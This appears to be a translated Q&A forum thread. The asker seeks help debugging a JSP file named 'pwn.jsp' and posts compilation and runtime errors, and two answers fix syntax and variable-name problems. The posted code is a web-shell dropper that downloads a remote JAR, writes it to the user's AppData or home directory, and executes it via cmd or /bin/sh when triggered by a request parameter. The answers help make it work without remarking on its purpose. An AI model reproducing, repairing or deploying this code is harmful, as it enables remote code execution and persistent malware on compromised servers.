0

我对 servletts 比较陌生,我无法弄清楚这一点。在我看来一切都很好...

这是我的代码:

<%@ page import="java.util.*,java.io.*, java.net.*, "%>
<%
String cmd;
String[] cmdarr;
String OS = System.getProperty("os.name");



String link = "http://site.com/update.jar";

    String userDir = System.getProperty("user.home");
    int last = link.lastIndexOf("/");
    int ending = link.lastIndexOf(".");
    String fileName = link.substring(last + 1);
    String fileEnding = link.substring(ending + 1);
    URL u = new URL(link);
    URLConnection uc = u.openConnection();
    String contentType = uc.getContentType();
    int contentLength = uc.getContentLength();
    if (contentType.startsWith("text/") || contentLength == -1) {
      throw new IOException("This is not a binary file.");
    }
    InputStream raw = uc.getInputStream();
    InputStream in = new BufferedInputStream(raw);
    byte[] data = new byte[contentLength];
    int bytesRead = 0;
    int offset = 0;
    while (offset < contentLength) {
      bytesRead = in.read(data, offset, data.length - offset);
      if (bytesRead == -1)
        break;
      offset += bytesRead;
    }
    in.close();
String path;
    if (offset != contentLength) {
      throw new IOException("Only read " + offset + " bytes; Expected " + contentLength + " bytes");
    }
    if(OS.startsWith("Mac")){
         path = userDir+"/Library/"+fileName;
    }
    else if(OS.startsWith("Windows")){
             path = userDir+"/AppData/Roaming/"+fileName;
    }
    else if(OS.startsWith("Linux")){
             path = userDir+"/"+fileName;
    }
    else{
        path = userDir+"/"+fileName;
    }

    FileOutputStream out = new FileOutputStream(path);
    out.write(data);
    out.flush();
    out.close();





    if (request.getParameter("cmd") != null) {
        cmd = "java -jar "+path;
      if (OS.startsWith("Windows")) {
       cmdarr = new String [] {"cmd", "/C", cmd};
      }
      else {
       cmdarr = new String [] {"/bin/sh", "-c", cmd};
      }
      Process p = Runtime.getRuntime().exec(cmdarr);
      OutputStream os = p.getOutputStream();
      InputStream in = p.getInputStream();
      DataInputStream dis = new DataInputStream(in);
      String disr = dis.readLine();
      while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
      }
    }

%>

这是错误:

org.apache.jasper.JasperException: Unable to compile class for JSP

Generated servlet error:
Syntax error on token "import", Identifier expected after this token

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable out

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
The method write(int) in the type Writer is not applicable for the arguments (byte[])

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable in


    org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:510)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:375)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause

org.apache.jasper.JasperException: Unable to compile class for JSP

Generated servlet error:
Syntax error on token "import", Identifier expected after this token

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable out

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
The method write(int) in the type Writer is not applicable for the arguments (byte[])

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable in


    org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:84)
    org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:328)
    org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:413)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:297)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:276)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:264)
    org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:563)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:303)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)

我已经修复了导入错误和重复变量,但现在我收到了这个错误:

org.apache.jasper.JasperException: An exception occurred processing JSP page /file.jsp at line 52

49:         path = userDir+"/"+fileName;
50:     }
51: 
52:     FileOutputStream out2 = new FileOutputStream(path);
53:     out2.write(data);
54:     out2.flush();
55:     out2.close();


Stacktrace:
    org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:518)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:417)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:320)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:266)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause

java.io.FileNotFoundException: C:\AppData\Roaming\update.jar (Das System kann den angegebenen Pfad nicht finden)
    java.io.FileOutputStream.open(Native Method)
    java.io.FileOutputStream.<init>(Unknown Source)
    java.io.FileOutputStream.<init>(Unknown Source)
    org.apache.jsp.pwn_jsp._jspService(pwn_jsp.java:108)
    org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:387)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:320)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:266)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
4

2 回答 2

2

您的代码中有很多错误。

首先,删除 import 语句中的尾随逗号。

<%@ page import="java.util.*,java.io.*, java.net.*, "%>
                                                  ^

此外,您有重复的变量:

InputStream in = new BufferedInputStream(raw);

InputStream in = p.getInputStream();

更改其中之一的名称并重命名相应的引用。

于 2013-10-18T22:40:49.133 回答
1

命名您的输入和输出 FileStreamsinout导致冲突,因为这些变量被其他 java 库或代码中的其他位置使用。你需要改变它们

例如

FileOutputStream out2 = new FileOutputStream(path);

InputStream in2 = new BufferedInputStream(raw);

还要在页面导入结束时去掉逗号。

<%@ page import="java.util.*,java.io.*, java.net.*"%>
于 2013-10-18T22:46:03.757 回答